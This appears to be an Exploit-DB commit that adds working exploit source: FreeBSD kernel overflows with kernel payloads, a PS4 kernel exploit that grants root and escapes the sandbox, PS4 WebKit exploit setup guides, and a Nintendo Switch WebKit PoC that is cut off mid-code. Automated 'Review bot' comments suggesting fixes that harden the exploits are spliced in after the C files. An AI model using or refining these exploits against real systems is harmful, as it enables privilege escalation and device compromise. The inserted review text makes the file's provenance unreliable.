DB: 2018-03-01

26 changes to exploits/shellcodes

Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)
FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)
FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)
Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption

Apple iOS - '.pdf' Jailbreak
Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak

Foxit Reader 4.0 - '.pdf' Jailbreak
Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak

Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution
Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' Handling Local Command Execution

Sony Playstation 4 4.05 FW - Local Kernel Loader
Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)

Sony Playstation 4 4.55 FW - Local Kernel
Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)
Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)
Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)
WebKitGTK 2.1.2  (Ubuntu 14.04) - Heap based Buffer Overflow
Linux Kernel - 'BadIRET' Local Privilege Escalation
Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader
Nintendo Switch - WebKit Code Execution (PoC)

Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak
Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak

Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)

EPIC MyChart - SQL Injection
EPIC MyChart - X-Path Injection

Routers2 2.24 - Cross-Site Scripting
Offensive Security 2018-03-01 05:01:48 +00:00
parent 5d48f0abd2
commit 6885f2dcc7
19 changed files with 1278 additions and 9 deletions


@ -1,4 +1,4 @@
# Exploit Title: Epic Systems Corporation MyChart SQL Injection
# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
@ -10,7 +10,7 @@
Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
The MyChart software uses Intersystems Caché for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.
EPIC was quick to respond to contact and patch the vulnerability in MyChart.


@ -0,0 +1,109 @@
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/kbio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/linker.h>
int (*kprintf)(const char *fmt, ...);
char *ostype;
uint64_t originalRip;
uint64_t originalRbp;
void *resolve(char *name) {
struct kld_sym_lookup ksym;
ksym.version = sizeof(ksym);
ksym.symname = name;
if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return (void *)ksym.symvalue;
}
void payload(void) {
kprintf(" [+] Entered kernel payload\n");
strcpy(ostype, "CTurt ");
__asm__ volatile("swapgs; sysret");
}
// Copy the stack onto the heap
void heapOverflow(int index, size_t size) {
fkeyarg_t fkey;
fkey.keynum = index;
fkey.flen = size;
memset(&fkey.keydef, 0, 16);
ioctl(0, SETFKEY, &fkey);
}
// Copy the heap onto the stack
void stackOverflow(int index) {
fkeyarg_t fkey;
fkey.keynum = index;
fkey.flen = 16;
memset(&fkey.keydef, 0, 16);
ioctl(0, GETFKEY, &fkey);
}
int main(void) {
int result, i;
fkeyarg_t fkey;
uint32_t ripLower4 = 0x808312cd; // jmp rbp
uint64_t rbp = (uint64_t)payload;
kprintf = resolve("printf");
ostype = resolve("ostype");
printf(" [+] Set full length for key 10\n");
fkey.keynum = 10;
fkey.flen = 16;
ioctl(0, SETFKEY, &fkey);
printf(" [+] Set bad length and perform heap overflow\n");
heapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));
printf(" [+] Prepare stack overflow memory\n");
fkey.keynum = 10;
fkey.flen = 16;
ioctl(0, GETFKEY, &fkey);
originalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);
originalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);
printf(" [+] Original rip: %#lx\n", originalRip);
printf(" [+] Original rbp: %#lx\n", originalRbp);
*(uint64_t *)((char *)&fkey.keydef + 4) = rbp;
*(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;
ioctl(0, SETFKEY, &fkey);
printf(" [+] Trigger stack overflow\n");
fflush(stdout);
stackOverflow(0);
return 0;
}
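Review bot: `fkey` in `main` is never initialised before the first `ioctl(0, SETFKEY, &fkey);` (the one following `fkey.flen = 16;`), so the 16 bytes of `keydef` handed to the kernel are whatever happened to be on the stack, unlike `heapOverflow`/`stackOverflow` which memset theirs; `fkeyarg_t fkey = {0};` removes the uninitialised read. None of the three ioctl calls in `main` checks its return value, so a failing GETFKEY leaves `originalRip`/`originalRbp` read from that same uninitialised buffer and the values printed afterwards are meaningless — `if(ioctl(0, GETFKEY, &fkey) < 0) { perror("GETFKEY"); return 1; }` makes the failure visible. `result` and `i` are declared and never used. `ripLower4 = 0x808312cd` is a build-specific constant, so its comment should name the exact kernel build it was taken from (the commit title only says FreeBSD 10.2 x64) rather than leaving readers to assume the PoC is general.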


@ -0,0 +1,159 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/param.h>
#include <sys/linker.h>
void *(*ata_get_xport)(void);
int (*kprintf)(const char *fmt, ...);
char *ostype;
void *resolve(char *name) {
struct kld_sym_lookup ksym;
ksym.version = sizeof(ksym);
ksym.symname = name;
if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return (void *)ksym.symvalue;
}
void dummy(void) {
}
void payload(void) {
kprintf(" [+] Entered kernel payload\n");
strcpy(ostype, "CTurt ");
}
#define INFO_SIZE 0
#define INFO_LIMIT 1
#define INFO_USED 2
#define INFO_FREE 3
#define INFO_REQ 4
#define INFO_FAIL 5
int getZoneInfo(char *zname, int i) {
#define BUF_SIZE 256
#define LINE_SIZE 56
unsigned int info[6] = { 0 };
FILE *fp = NULL;
char buf[BUF_SIZE];
char iname[LINE_SIZE];
fp = popen("/usr/bin/vmstat -z", "r");
if(fp == NULL) {
perror("popen");
exit(1);
}
memset(buf, 0, sizeof(buf));
memset(iname, 0, sizeof(iname));
while(fgets(buf, sizeof(buf) - 1, fp) != NULL) {
sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, &info[INFO_SIZE], &info[INFO_LIMIT],
&info[INFO_USED], &info[INFO_FREE], &info[INFO_REQ], &info[INFO_FAIL]);
if(strncmp(iname, zname, strlen(zname)) == 0 && iname[strlen(zname)] == ':') {
break;
}
}
pclose(fp);
return info[i];
}
void craftCorruptedZone(void *zone) {
void **uz_slab = (void **)(zone + 200);
void **uz_dtor = (void **)(zone + 216);
void **uz_fini = (void **)(zone + 232);
void **uz_import = (void **)(zone + 240);
void **uz_release = (void **)(zone + 248);
*uz_slab = dummy;
*uz_fini = payload;
*uz_import = dummy;
*uz_release = dummy;
}
void craftZone(void *zone) {
void **uz_slab = (void **)(zone + 200);
void **uz_dtor = (void **)(zone + 216);
void **uz_fini = (void **)(zone + 232);
void **uz_import = (void **)(zone + 240);
void **uz_release = (void **)(zone + 248);
// put valid kernel address
*uz_slab = ata_get_xport;
*uz_fini = ata_get_xport;
*uz_import = ata_get_xport;
*uz_release = ata_get_xport;
}
int main(void) {
int sock;
struct msghdr msg;
ata_get_xport = resolve("ata_get_xport");
kprintf = resolve("printf");
ostype = resolve("ostype");
const int previousAllocations = getZoneInfo("mbuf", INFO_USED);
const size_t bufferSize = getZoneInfo("mbuf", INFO_SIZE);
const size_t overflowSize = previousAllocations * bufferSize + 0x4000;
char *mapping, *buffer, *overflow;
const size_t copySize = bufferSize + overflowSize;
const size_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
munmap(mapping + mappingSize, PAGE_SIZE);
buffer = mapping + mappingSize - copySize;
overflow = buffer + bufferSize;
memset(overflow, 0, overflowSize);
// sizeof(struct uma_zone) == 0x300, but since we can't be certain exactly where we overflow from, we will craft at 256 byte intervals
for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
craftCorruptedZone(overflow + i);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&msg, 0, sizeof(msg));
msg.msg_control = buffer;
msg.msg_controllen = -1;
printf(" [+] Performing overflow\n");
sendmsg(sock, &msg, 0);
printf(" [+] Triggering payload\n");
close(sock);
sock = socket(AF_INET, SOCK_STREAM, 0);
for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
craftZone(overflow + i);
}
printf(" [+] Performing overflow\n");
sendmsg(sock, &msg, 0);
munmap(mapping, mappingSize);
return 0;
}
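Review bot: `getZoneInfo` parses `vmstat -z` output with `sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, ...)` and no field width, so a zone name longer than `LINE_SIZE - 1` characters overflows the 56-byte `iname` on the stack; use `"%55s %u, %u, %u, %u, %u, %u\n"` and keep the width in step with `LINE_SIZE`. The index `i` is used unchecked against the six-element `info` array; the callers pass the `INFO_*` macros today, but a guard such as `if(i < 0 || i >= 6) return 0;` before the popen documents the contract. Smaller points: `<sys/param.h>` is included twice, `uz_dtor` is computed and unused in both `craftCorruptedZone` and `craftZone`, `zone + 200` is arithmetic on a `void *` (a GCC extension — cast through `char *` to stay standard C), and the result of `mapping = mmap(NULL, ...)` is never compared with `MAP_FAILED` before `munmap(mapping + mappingSize, PAGE_SIZE)` uses it.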


@ -0,0 +1,28 @@
PS4 5.01 WebKit Exploit PoC
===========================
Based on:
- [CVE-2017-7005](https://bugs.chromium.org/p/project-zero/issues/detail?id=1208)
- [PegaSwitch](https://github.com/reswitched/pegaswitch) ([Copyright 2017 ReSwitched Team](https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md))
- 4.0x exploit by [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
> This exploit supports 5.01 (maybe others)!
Installation
============
1. Install the latest version of node from [nodejs.org](https://nodejs.org)
2. Clone this repository
3. Run `npm install`
Usage
=====
1. Run `npm start`
License
=======
MIT License. See attached `LICENSE.md` file.
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44197.zip


@ -0,0 +1,29 @@
PS4 4.0x Code Execution
==============
This repo is my edit of the [4.0x webkit exploit](http://rce.party/ps4/) released by [qwertyoruiopz](https://twitter.com/qwertyoruiopz). The edit re-organizes, comments, and adds portability across 3.50 - 4.07 (3.50, 3.55, 3.70, 4.00, and of course 4.06/4.07). The commenting and reorganization was mostly for my own learning experience, however hopefully others can find these comments helpful and build on them or even fix them if I've made mistakes. The exploit is much more stable than FireKaku and sets up the foundation for running basic ROP chains and returns to normal execution. Credit for the exploit goes completely to qwertyoruiopz.
Organization
==============
Files in order by name alphabetically;
* expl.js - Contains the heart of the exploit and establishes a read/write primitive.
* gadgets.js - Contains gadget maps and function stub maps for a variety of firmwares. Which map is used is determined in the post-exploitation phase.
* index.html - The main page for the exploit. Launches the exploit and contains post-exploitation stuff, as well as output and code execution.
* rop.js - Contains the ROP framework modified from Qwerty's original exploit as well as the array in which module base addresses are held and gadget addresses are calculated.
* syscalls.js - Contains a system call map for a variety of firmwares as well as a 'name -> number' map for syscall ID's.
Usage
==============
Simply setup a web-server on localhost using xampp or any other program and setup these files in a directory. You can then go to your computer's local IPv4 address (found by running ipconfig in cmd.exe) and access the exploit.
Notes
==============
* The exploit is pretty stable but will still sometimes crash. If the browser freezes simply back out and retry, if a segmentation fault (identified by prompt "You do not have enough free system memory") occurs, refresh the page before trying again as it seems to lead to better results.
* This only allows code execution in ring3, to get ring0 execution a kernel exploit and KROP chain is needed.
* If I've made an error (particularily having to do with firmware compatibility and gadgets) feel free to open an issue on the repo.
* The exploit has been tested on 3.55 and 4.00, it is assumed to work on other firmwares listed but not guaranteed, again if you encounter a problem - open an issue on the repo.
Credits
==============
qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/).
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44198.zip


@ -0,0 +1,83 @@
PS4 3.55 Unsigned Code Execution
==============
This GitHub Repository contains all the necessary tools for getting PoC Unsigned Code Execution on a Sony PS4 System with firmwares 3.15, 3.50 and 3.55. <br />
This Exploit, is based-off [Henkaku's](https://henkaku.xyz/) WebKit Vulnerability for the Sony's PSVita. <br />
It includes basic ROP and is able to return to normal execution. <br />
Pre-Requisites:
==============
1. A PC
1. Running Windows, macOS or Linux
2. A already set up basic server where the PS4 User's Guide launcher will point for loading the payload
3. [Python](https://www.python.org/downloads/) 2.7.X
* Python 3.X gives problems, since they included major changes on the syntax and on the libraries in comparison with 2.7
2. A Sony PlayStation 4
1. Running the following firmwares:
* 3.15, 3.50 or 3.55
3. Internet Connection (PS4 and PC directly wired to the Router is the mostly preferred option)
Usage:
==============
There are two different methods to execute the Exploit, but first let's clarify how we will know which one to use. <br />
If your PlayStation 4 has got an already set-up PlayStation Network Account on it, you should use method 1. <br />
Else, if your PlayStation 4 -NEVER- had a PlayStation Network Account on it, you should use method 2. <br />
Probably you will ask why, it's pretty much easy to explain and understand: <br />
When you buy a PS4, comes unactivated, meaning that nobody has entered SEN Account on it. (Method 2) <br />
Once you use a SEN Account on it, the PS4 becomes an activated console. (Method 1) <br />
This doesn't affect the actual payload, but you should take in mind which method use. <br />
Method 1:
==============
Run this command on the folder you've downloaded this repo: <br />
`python server.py` <br />
All the debug options will be outputted during the Exploit process. <br />
Navigate to your PS4's Web Browser and simply type on the adress bar, your PC's IP Adress. <br />
Wait until the exploit finishes, once it does, PS4 will return to it's normal state. <br />
An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
Method 2:
==============
A dns.conf file which is present on the source, needs to be edited accordingly your local PC's IP Adress. <br />
PlayStation 4's DNS Settings must be changed in order to point the PC's IP Adress where the Exploit is located. <br />
Once you've edited the dns.conf file, simply run the next command on the folder where you downloaded this repo: <br />
`python fakedns.py -c dns.conf` <br />
And then: <br />
`python server.py` <br />
All the debug options will be outputted during the Exploit process. <br />
Once Python part is done, get into your PlayStation 4, navigate to the User's Guide page and wait until exploit finishes out. <br />
An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
Miscellaneous:
==============
If you want to try the socket test, change the IP Address located at the bottom of the ps4sploit.html file with your computer's one and run this command: <br />
`netcat -l 0.0.0.0 8989 -v` <br />
You should see something like: <br />
```
Listening on [0.0.0.0] (family 0, port 8989)
Connection from [192.168.1.72] port 8989 [tcp/sunwebadmins] accepted (family 2, sport 59389)
Hello From a PS4!
```
Notes about this exploit:
==============
* Currently, the exploit does not work 100%, but is around 80% which is fine for our purposes. <br />
* Although it is confirmed to work, sometimes will fail, just wait some seconds and re-run the payload. <br />
* Performing too much memory allocation after sort() is called, can potentially lead to more instability and it may crash more. <br />
* The process will crash after the ROP payload is done executing. <br />
* This is only useful for researchers. There are many many more steps needed before this becomes useful to normal users. <br />
Acknowledgements
================
xyz - Much of the code is based off of his code used for the Henkaku project
Anonymous contributor - WebKit Vulnerability PoC
CTurt - I basically copied his JuSt-ROP idea
xerpi - Used his idea for the socket code
rck\`d - Finding bugs such as not allocating any space for a stack on function calls
Maxton - 3.50 support and various cleanup
Thunder07 - 3.15 support
Contributing
================
The code currently is a bit of a mess, so if you have any improvements feel free to send a pull request or make an issue. Also I am perfectly fine if you want to fork and create your own project.
Download:


@ -0,0 +1,21 @@
CVE 2014-1303 Proof Of Concept for PS4
==============
This repository contains a poc for the CVE 2014-1303 originally disclosed by Liang Chen. It has been tested to work on system firmware 2.03, but should work for systems on a firmware < 2.50, the ROP test will however only work on 2.03.
Usage
==============
You need to edit the dns.conf to point to the ip address of your machine, and modify your consoles dns settings to point to it as well. Then run
`python fakedns.py -c dns.conf`
then
`python server.py`
Debug output will come from this process.
Navigate to the User's Guide page on the PS4 and various information should be printed to the console. The ROP test will print what is stored in the rsp register. Continuing execution after rsp is pivoted still needs to be done.
Acknowledgements
================
Liang Chen
thexyz
dreadlyei
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44200.zip


@ -0,0 +1,274 @@
/*
Code written based on info available here http://cturt.github.io/dlclose-overflow.html
See attached LICENCE file
Thanks to CTurt and qwertyoruiop
- @kr105rlz
Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
*/
#include "ps4.h"
#define DEBUG_SOCKET
#include "defines.h"
static int sock;
static void *dump;
void payload(struct knote *kn) {
struct thread *td;
struct ucred *cred;
// Get td pointer
asm volatile("mov %0, %%gs:0" : "=r"(td));
// Enable UART output
uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;
*securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0
// Print test message to the UART line
printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n");
// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);
// sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
*(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;
*(char *)0xFFFFFFFF8332431A = 1;
*(char *)0xFFFFFFFF83324338 = 1;
// Restore write protection
writeCr0(cr0);
// Resolve creds
cred = td->td_proc->p_ucred;
// Escalate process to root
cred->cr_uid = 0;
cred->cr_ruid = 0;
cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;
// sceSblACMgrGetDeviceAccessType
uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
*sceProcType = 0x3801000000000013; // Max access
// sceSblACMgrHasSceProcessCapability
uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
*sceProcCap = 0xffffffffffffffff; // Sce Process
((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true
((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check
// Jailbreak ;)
cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0
// Break out of the sandbox
void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
*td_fdp_fd_rdir = *rootvnode;
*td_fdp_fd_jdir = *rootvnode;
}
// Perform kernel allocation aligned to 0x800 bytes
int kernelAllocation(size_t size, int fd) {
SceKernelEqueue queue = 0;
sceKernelCreateEqueue(&queue, "kexec");
sceKernelAddReadEvent(queue, fd, 0, NULL);
return queue;
}
void kernelFree(int allocation) {
close(allocation);
}
void *exploitThread(void *none) {
printfsocket("[+] Entered exploitThread\n");
uint64_t bufferSize = 0x8000;
uint64_t overflowSize = 0x8000;
uint64_t copySize = bufferSize + overflowSize;
// Round up to nearest multiple of PAGE_SIZE
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
munmap(mapping + mappingSize, PAGE_SIZE);
uint8_t *buffer = mapping + mappingSize - copySize;
int64_t count = (0x100000000 + bufferSize) / 4;
// Create structures
struct knote kn;
struct filterops fo;
struct knote **overflow = (struct knote **)(buffer + bufferSize);
overflow[2] = &kn;
kn.kn_fop = &fo;
// Setup trampoline to gracefully return to the calling thread
void *trampw = NULL;
void *trampe = NULL;
int executableHandle;
int writableHandle;
uint8_t trampolinecode[] = {
0x58, // pop rax
0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919
0x50, // push rax
0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe
0xFF, 0xE0 // jmp rax
};
// Get Jit memory
sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);
sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);
// Map r+w & r+e
trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);
trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);
// Copy trampoline to allocated address
memcpy(trampw, trampolinecode, sizeof(trampolinecode));
*(void **)(trampw + 14) = (void *)payload;
// Call trampoline when overflown
fo.f_detach = trampe;
// Start the exploit
int sockets[0x2000];
int allocation[50], m = 0, m2 = 0;
int fd = (bufferSize - 0x800) / 8;
printfsocket("[+] Creating %d sockets\n", fd);
// Create sockets
for(int i = 0; i < 0x2000; i++) {
sockets[i] = sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
if(sockets[i] >= fd) {
sockets[i + 1] = -1;
break;
}
}
// Spray the heap
for(int i = 0; i < 50; i++) {
allocation[i] = kernelAllocation(bufferSize, fd);
printfsocket("[+] allocation = %llp\n", allocation[i]);
}
// Create hole for the system call's allocation
m = kernelAllocation(bufferSize, fd);
m2 = kernelAllocation(bufferSize, fd);
kernelFree(m);
// Perform the overflow
int result = syscall(597, 1, mapping, &count);
printfsocket("[+] Result: %d\n", result);
// Execute the payload
printfsocket("[+] Freeing m2\n");
kernelFree(m2);
// Close sockets
for(int i = 0; i < 0x2000; i++) {
if(sockets[i] == -1)
break;
sceNetSocketClose(sockets[i]);
}
// Free allocations
for(int i = 0; i < 50; i++) {
kernelFree(allocation[i]);
}
// Free the mapping
munmap(mapping, mappingSize);
return NULL;
}
int _main(void) {
ScePthread thread;
initKernel();
initLibc();
initNetwork();
initJIT();
initPthread();
#ifdef DEBUG_SOCKET
struct sockaddr_in server;
server.sin_len = sizeof(server);
server.sin_family = AF_INET;
server.sin_addr.s_addr = IP(192, 168, 0, 4);
server.sin_port = sceNetHtons(9023);
memset(server.sin_zero, 0, sizeof(server.sin_zero));
sock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0);
sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));
int flag = 1;
sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
#endif
printfsocket("[+] Starting...\n");
printfsocket("[+] UID = %d\n", getuid());
printfsocket("[+] GID = %d\n", getgid());
// Create exploit thread
if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) {
printfsocket("[-] pthread_create error\n");
return 0;
}
// Wait for thread to exit
scePthreadJoin(thread, NULL);
// At this point we should have root and jailbreak
if(getuid() != 0) {
printfsocket("[-] Kernel patch failed!\n");
sceNetSocketClose(sock);
return 1;
}
printfsocket("[+] Kernel patch success!\n");
// Enable debug menu
int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
RESOLVE(libKernelHandle, sysctlbyname);
uint32_t enable;
size_t size;
enable = 1;
size = sizeof(enable);
sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
#ifdef DEBUG_SOCKET
munmap(dump, PAGE_SIZE);
#endif
printfsocket("[+] bye\n");
sceNetSocketClose(sock);
return 0;
}
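Review bot: The socket-creation loop in `exploitThread` writes `sockets[i + 1] = -1;` when its break condition fires, which is one past the end of `int sockets[0x2000]` if `i` is `0x1fff`; guard it with `if(i + 1 < 0x2000) sockets[i + 1] = -1;` or size the array one larger. `printfsocket("[+] allocation = %llp\n", allocation[i]);` combines the `ll` length modifier with `%p` for an `int` argument, and `%d` is the matching conversion; `kernelAllocation` also takes a `size` parameter it never reads. `#define DEBUG_SOCKET` sits directly above `#include "defines.h"`, so the `#ifdef DEBUG_SOCKET` blocks in `_main` are unconditional, while both `sceNetSocketClose(sock)` calls sit outside them and would close descriptor 0 if the define were ever dropped — either remove the guards or move the close calls inside. The absolute kernel addresses in `payload` and the `IP(192, 168, 0, 4)` / port 9023 debug endpoint are firmware- and environment-specific, so the file header comment should state the firmware those constants belong to (the commit title names 1.76) and mark the debug address as a local placeholder.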


@ -0,0 +1,218 @@
<!doctype html>
<html>
<head>
<title>CVE-2016-4657 Switch PoC</title>
<style>
body {font-size: 2em;}
a {text-decoration: none; color: #000;}
a:hover {color: #f00; font-weight: bold;}
</style>
</head>
<body>
<h1>CVE-2016-4657 Nintendo Switch PoC</h1>
<ul>
<li><a href=\'javascript:go();\'> go!</a></li>
<li><a href=\'javascript:document.location.reload();\'> reload</a></li>
</ul>
<div id=\'status\'> waiting... click go.</div>
<script>
// display JS errors as alerts. Helps debugging.
window.onerror = function(error, url, line) {
alert(error+\' URL:\'+url+\' L:\'+line);
};
</script>
<script>
// based on jbme.qwertyoruiop.com
// Thanks to:
// + qwertyoruiop
// + Retr0id
// + Ando
//
// saelo\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html
// garbage collection stuff
var pressure = new Array(100);
// do garbage collect
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
// access to the overlapping Uint32Array
var bufs = new Array(0x1000);
// we will modify the vector of this
var smash = new Uint32Array(0x10);
// the array with the stale pointer
var stale = 0;
var _dview = null;
// write 2x 32bit in a DataView and get the Float representation of it
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
function go_() {
// check if the length of the array smash changed already. if yes, bail out.
if (smash.length != 0x10) return;
// garbage collect
dgc();
// new array with 0x100 elements
var arr = new Array(0x100);
// new array buffer of length 0x1000
var yolo = new ArrayBuffer(0x1000);
// populate the arr with pointer to yolo and a number. not quite sure why.
arr[0] = yolo;
arr[1] = 0x13371337;
// create an object whos toString function returns number 10 and messes with arr.
var not_number = {};
not_number.toString = function() {
arr = null;
props[\"stale\"][\"value\"] = null;
// if bufs is already overlapping memory, bail out.
if (bufs[0]) return 10;
// really make sure garbage is collected
// the array pointed at by arr should be gone now.
for (var i = 0; i < 20; i++) {
dgc();
}
// for the whole buf Array
for (i = 0; i < bufs.length; i++) {
// fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier
bufs[i] = new Uint32Array(0x100 * 2)
// for each element of that array
for (k = 0; k < bufs[i].length;) {
// set memory to 0x41414141 0xffff0000
// basically spraying the JSValue 0xffff000041414141
// which is the Integer 0x41414141
// phrack: Integer FFFF:0000:IIII:IIII
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
return 10;
};
// define a new object with some properties
var props = {
p0: { value: 0 },
p1: { value: 1 },
p2: { value: 2 },
p3: { value: 3 },
p4: { value: 4 },
p5: { value: 5 },
p6: { value: 6 },
p7: { value: 7 },
p8: { value: 8 },
// the length of this object is set to this object that does evil stuff with toString()
length: { value: not_number },
// the reference to the arr array. Which will later be freed.
stale: { value: arr },
after: { value: 666 }
};
// define a new target array
var target = [];
// TRIGGER BUG!
// set the properties of the target based on the previously defined ones
Object.defineProperties(target, props);
// get a reference to the target stale property, which points to arr
stale = target.stale;
// make sure that the stale[0] points actually to the 0x41414141 data if not, we don\'t wanna mess with it and try again
if(stale[0]==0x41414141) {
// stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242
stale[0] += 0x101;
//stale[0] = 0x41414242;
//document.getElementById(\'status\').innerText = \'bug done.\';
// searching the whole memory that is overlaying the old arr. Looking for 0x41414242
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
